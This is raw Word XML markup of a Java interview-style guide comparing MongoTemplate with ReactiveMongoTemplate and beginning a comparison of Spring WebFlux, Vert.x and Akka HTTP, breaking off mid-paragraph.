    <w:p w14:paraId="080E42C4" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26241513"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List&lt;Item&gt; getItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51493266"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mongoTemplate.findAll(Item.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F4B40"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4B9681B5"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thread is blocked while fetching the items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FAE414"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Using ReactiveMongoTemplate in a Reactive Spring WebFlux Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0CCE00"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49479DB5"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rivate ReactiveMongoTemplate reactiveMongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B79FC13" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C83E24"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Flux&lt;Item&gt; getItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04D1BB"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reactiveMongoTemplate.findAll(Item.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEC715"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0458236F"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he database operation is non-blocking, and it returns a Flux that can be subscribed to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445412A5"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Summary of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3"/>
        <w:gridCol w:w="3792"/>
        <w:gridCol w:w="4619"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="773ADBD7" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685C1C0E"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30AD364E"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MongoTemplate (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0009136D"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ReactiveMongoTemplate (Spring WebFlux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="46E2E976" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2810BD7F"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Programming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2542721A"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erative (blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0120156F"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active (non-blocking, asynchronous)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="154BD0A7" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A233F2B"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turn Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="053B17C3"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ynchronous values (e.g., List&lt;T&gt;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470B3DBA"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active types (Mono, Flux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4219030B" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18906678"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oncurrency Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B7CE3A"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Blocking threads for each operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046F6F99"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Non-blocking, handles concurrency more efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3FEDD9BE" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54969B41"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Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CEF9C9"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sed with traditional Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F516073"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sed with Spring WebFlux (reactive framework)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4073716D" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22C7302E"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E902C9A"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Can lead to thread exhaustion under high load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C0BEC43"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calable, handles high concurrency without thread blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="08DFA001" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D32715"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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8F2B37"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raditional exception handling (e.g., try-catch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1179CDFA"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active error handling with operators like onErrorResume()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="65772F82" w14:textId="77777777" w:rsidTr="00B506B2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0609F1FA"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Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4694AC5B"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uitable for traditional web apps with lower concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A50329"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uitable for highly scalable, real-time, and concurrent applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2866727B"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42B3DE"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MongoTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is appropriate for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional</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imperative</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blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications where database operations don't need to be asynchronous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB4E07"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ctiveMongoTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications using </w:t>
      </w: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xml:space="preserve"> and provides non-blocking database operations, which helps to maximize scalability and performance in scenarios with high concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B6433"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42C8220">
          <v:rect id="_x0000_i2333" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FE673" w14:textId="784F198B"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30" w:name="_Toc196308010"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux compare to Vert.x and Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="530"/>
    </w:p>
    <w:p w14:paraId="4386068F" w14:textId="15A4E92C" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2"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 WebFlux, Vert.x, and Akka HTTP are all frameworks that enable reactive, non-blocking applications, but they differ in their design philosophies, underlying architectures, and use cases. Let's compare them based on several key factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B67950"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 Core Concepts and Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58B1F9"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pring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB09B57"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Built on Reactor (and RxJava for alternative)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux is part of the Spring ecosystem and relies on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> library (or optionally RxJava) to provide non-blocking, reactive programming features. It uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and integrates well with Spring Boot and other Spring components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31441214"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Integration with Spring ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It's deeply integrated with other Spring components like Spring Security, Spring Data, and Spring Cloud. WebFlux provides both annotation-based (@RestController) and functional routing models to define endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7648F5"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lastRenderedPageBreak/>
        <w:t>Thread-per-request model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</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Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) as the underlying server for reactive HTTP communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9A19E"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Vert.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19F03B"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vent-driven, asynchronous, and non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x is a polyglot, lightweight, event-driven framework built on top of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It allows you to write highly concurrent, non-blocking applications using a small number of threads. It is not tied to any specific language, though Java is the most popular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121EC5C"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Non-blocking event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model for each core processor (no thread-per-request), making it extremely efficient for handling concurrent I/O-bound operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75790A"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Polyglot</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports multiple languages like Java, Kotlin, JavaScript, Groovy, and Ruby, making it more flexible for polyglot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB13286"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Akka HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC19DE"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Actor model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akka framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actor model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building highly concurrent, scalable systems. The Akka model focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message-passing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between lightweight actors to achieve concurrency and avoid mutable state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A935A9"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Like Vert.x, Akka HTTP provides non-blocking, asynchronous I/O. It integrates well with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to support backpressure and streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C7055"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Functional-style routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model where routes are defined as functions. It also supports custom handling and transformations of HTTP responses and requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE41D9"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2. Concurrency Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60FAEC"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pring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36870873"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ctor-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux is based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
